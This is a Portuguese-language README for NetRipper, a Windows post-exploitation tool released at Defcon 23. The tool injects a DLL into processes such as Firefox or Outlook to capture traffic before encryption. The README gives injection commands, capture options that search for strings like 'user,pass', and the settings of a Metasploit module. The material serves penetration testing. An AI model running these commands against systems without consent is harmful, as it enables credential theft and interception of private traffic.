
NetRipper - Sniffing inteligente de tráfego para testadores de penetração
NetRipper é uma ferramenta de pós-exploração voltada para sistemas Windows que utiliza API hooking para interceptar o tráfego de rede e funções relacionadas à criptografia a partir de um usuário com privilégios baixos, sendo capaz de capturar tanto tráfego em texto simples quanto tráfego criptografado antes da criptografia/após a descriptografia.
NetRipper foi lançado no Defcon 23, Las Vegas, Nevada.
O uso do NetRipper para atacar alvos sem consentimento mútuo prévio é ilegal. É de responsabilidade do usuário final obedecer a todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não se responsabilizam por qualquer uso indevido ou dano causado por este programa!
As atividades de pós-exploração em um teste de penetração podem ser desafiadoras se o testador tiver privilégios baixos em uma máquina Windows totalmente atualizada e bem configurada. Este trabalho apresenta uma técnica para ajudar o testador a encontrar informações úteis ao farejar o tráfego de rede dos aplicativos na máquina comprometida, apesar de seus baixos privilégios. Além disso, o tráfego criptografado também é capturado antes de ser enviado para a camada de criptografia, portanto, todo o tráfego (texto simples e criptografado) pode ser farejado. A implementação desta técnica é uma ferramenta chamada NetRipper, que utiliza API hooking para realizar as ações mencionadas acima e que foi especialmente projetada para ser usada em testes de penetração, mas o conceito também pode ser usado para monitorar o tráfego de rede de funcionários ou para analisar um aplicativo malicioso.
NetRipper deve ser capaz de capturar tráfego de rede de: Putty, WinSCP, SQL Server Management Studio, Microsoft Outlook, Google Chrome, Mozilla Firefox e várias outras ferramentas. A lista não se limita a esses aplicativos, mas outras ferramentas podem exigir suporte especial.
NetRipper.exe - Configures and inject the DLL
DLL.dll - Injected DLL, hook APIs and save data to files
netripper.rb - Metasploit post-exploitation module
Uma compilação automática no AppVeyor está disponível. Os binários podem ser baixados da seção Artifacts aqui.
Injection: NetRipper.exe DLLpath.dll processname.exe
Example: NetRipper.exe DLL.dll firefox.exe
Generate DLL:
-h, --help Print this help message
-w, --write Full path for the DLL to write the configuration data
-l, --location Full path where to save data files (default TEMP)
Plugins:
-p, --plaintext Capture only plain-text data. E.g. true
-d, --datalimit Limit capture size per request. E.g. 4096
-s, --stringfinder Find specific strings. E.g. user,pass,config
Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass
msf exploit(multi/handler) > use post/windows/gather/netripper/netripper
msf post(windows/gather/netripper/netripper) > show options
Module options (post/windows/gather/netripper/netripper):
Name Current Setting Required Description
---- --------------- -------- -----------
DATALIMIT 65535 no O número de bytes para salvar de requisições/respostas
DATAPATH TEMP no Onde salvar os arquivos. Ex.: C:\Windows\Temp ou TEMP
DLLPATH no Onde encontrar as DLLs do NetRipper. O padrão é /usr/share/metasploit-framework...
PLAINTEXT false no True para salvar apenas dados em texto simples
PROCESSIDS no IDs de processo. Ex.: 1244,1256
PROCESSNAMES no Nomes de processo. Ex.: firefox.exe,chrome.exe
SESSION yes A sessão na qual executar este módulo.
STRINGFINDER DEFAULT no Procurar por strings específicas nos dados capturados
Defina PROCESSNAMES ou PROCESSIDS e execute.
@HarmJ0y Adicionou a implementação Invoke-NetRipper.ps1 do NetRipper.exe no PowerShell. Observe que o módulo PowerShell não está atualizado.
Você pode encontrar o changelog no arquivo "Changelog.md" e as instruções de compilação no arquivo "Compilation.md".
NetRipper usa
Ionut Popescu (@NytroRST)